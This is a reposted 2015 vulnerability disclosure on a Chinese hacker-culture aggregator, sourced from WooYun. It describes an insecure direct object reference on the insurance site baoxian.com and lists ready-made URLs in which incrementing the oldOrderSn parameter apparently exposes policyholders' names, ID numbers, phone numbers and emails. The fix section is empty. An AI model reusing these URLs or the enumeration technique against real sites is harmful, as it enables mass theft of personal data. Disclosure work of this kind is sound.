记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

泛华保网某漏洞可导致全站投保人保单信息泄露

2015-09-15 17:35

越权地址:

http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004811&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01



例子:

http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004813&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01



http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004814&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01



http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004815&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01



http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004816&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01



其中oldOrderSn=参数存在遍历越权





泄露的信息:



*姓名:请填写真实姓名

*证件类型:身份证请选择合法有效的证件类型

*证件号码:请填写与证件相符的证件号码

*性别:男

*出生日期:

*手机号码:

*Email地址:格式:[email protected]

保存至常用联系人:

保存至常用地址:



漏洞证明:

VYE9({9N5{Z3XA6TTLU)D]4.png

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0129832

阅读:77178 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“泛华保网某漏洞可导致全站投保人保单信息泄露”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云